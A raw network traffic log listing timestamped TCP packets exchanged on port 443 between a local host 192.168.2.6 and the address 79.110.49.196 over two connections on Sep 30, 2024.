Sep 30, 2024 14:20:18.632000923 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.632008076 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.633768082 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.639870882 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.639903069 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.639977932 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.639985085 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.640049934 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.640518904 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.640527010 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.640609026 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.640614986 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.641115904 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.641139984 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.641184092 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.641190052 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.641227007 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.641808033 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.641830921 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.641881943 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.641892910 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.641916990 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.642321110 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.642340899 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.642391920 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.642398119 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.642430067 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.642477036 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.643039942 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.643063068 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.643125057 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.643125057 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.643135071 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.643210888 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.643867016 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.643887997 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.643929005 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.643934965 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.644007921 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.644007921 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.651379108 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.718624115 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.718643904 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.718756914 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.718763113 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.719496965 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.726675987 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.726702929 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.726753950 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.726761103 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.726809978 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.726838112 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.727556944 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.727581024 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.727622032 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.727627039 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.727655888 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.727689028 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.728197098 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.728219032 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.728291035 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.728291035 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.728296995 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.728713989 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.728743076 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.728805065 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.728805065 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.728811026 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.729176998 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.729202986 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.729259014 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.729264975 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.729286909 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.729424000 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.730178118 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.730197906 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.730248928 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.730253935 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.730289936 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.730313063 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.730954885 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.730974913 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.731044054 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.731044054 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.731055975 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.734072924 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.736999035 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.805713892 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.805738926 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.805814981 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.805821896 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.805861950 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.805916071 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.813612938 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.813617945 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.813728094 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.813735008 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.814075947 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.814327955 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.814347982 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.814409971 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.814415932 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.814966917 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.814990997 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.815042973 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.815048933 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.815062046 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.815108061 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.815841913 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.815860033 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.815912962 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.815969944 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.815984011 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.815999031 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.816011906 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.816046953 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.817147970 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.817166090 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.817231894 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.817238092 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.817255020 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.817821026 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.817843914 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.817878008 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.817883968 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.817945957 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.828768015 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.829006910 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.892529964 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.892549992 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.892617941 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.892632008 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.892741919 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.900559902 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.900587082 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.900631905 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.900638103 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.900676012 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.900687933 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.901261091 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.901281118 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.901335001 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.901340008 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.901371956 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.901381969 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.902004957 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.902024984 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.902067900 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.902072906 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.902101040 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.902143955 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.902270079 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.902290106 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.902331114 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.902340889 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.902359962 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.902406931 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.903027058 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.903045893 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.903091908 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.903096914 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.903125048 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.903136969 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.903882980 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.903903008 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.903978109 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.903984070 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.904050112 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.904825926 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.904849052 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.904884100 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.904889107 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.904921055 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.904947042 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.979593992 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.979615927 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.979693890 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.979703903 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.979758978 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.987703085 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.987723112 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.987799883 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.987807989 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.987838984 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.987883091 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.988353014 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.988373041 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.988445044 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.988451958 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.988507032 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.989037037 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.989056110 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.989104986 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.989111900 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.989120960 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.989152908 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.989300966 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.989339113 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.989360094 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.989363909 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.989389896 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.989413023 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.990478039 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.990498066 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.990555048 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.990561008 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.990597010 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.990627050 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.990961075 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.991014957 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.991046906 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.991051912 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.991091967 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.991106033 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.991811991 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.991831064 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.991882086 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.991889000 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.991905928 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.991935968 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.066684008 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.066716909 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.066806078 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.066823006 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.066899061 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.074609041 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.074630976 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.074718952 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.074726105 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.074788094 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.075078964 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.075098038 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.075156927 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.075162888 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.075256109 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.076073885 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.076092958 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.076149940 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.076157093 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.076258898 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.076738119 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.076756954 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.076853991 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.076853991 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.076860905 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.076940060 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.077342987 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.077362061 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.077419996 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.077426910 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.077472925 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.077609062 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.077627897 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.077687979 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.077693939 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.077739000 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.078464031 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.078473091 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.078588009 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.078593969 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.078682899 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.153534889 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.153561115 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.153717041 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.153728008 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.153862953 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.161588907 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.161608934 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.161712885 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.161719084 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.161780119 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.162247896 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.162269115 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.162316084 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.162321091 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.162350893 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.162384033 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.162874937 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.162897110 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.162933111 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.162938118 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.162965059 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.162969112 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.162986994 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.162992001 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.163038969 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.163048029 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.163055897 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.163100958 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.163306952 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.209330082 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.209391117 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.209495068 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.209741116 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.209758997 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.831341028 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:19.833018064 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:19.833065033 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.093662977 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.093691111 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.093709946 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.093775988 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.093810081 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.093827963 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.093857050 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.179352045 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.179398060 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.179486990 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.179513931 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.179541111 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.179558039 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.181337118 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.181358099 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.181420088 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.181427956 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.181472063 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.181490898 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.265353918 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.265374899 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.265497923 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.265510082 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.265583038 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.266571999 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.266592026 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.266674042 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.266681910 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.266725063 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.267713070 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.267734051 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.267811060 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.267818928 CEST	443	49739	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:20.267860889 CEST	49739	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:20.269161940 CEST	443	49739	79.110.49.196	192.168.2.6
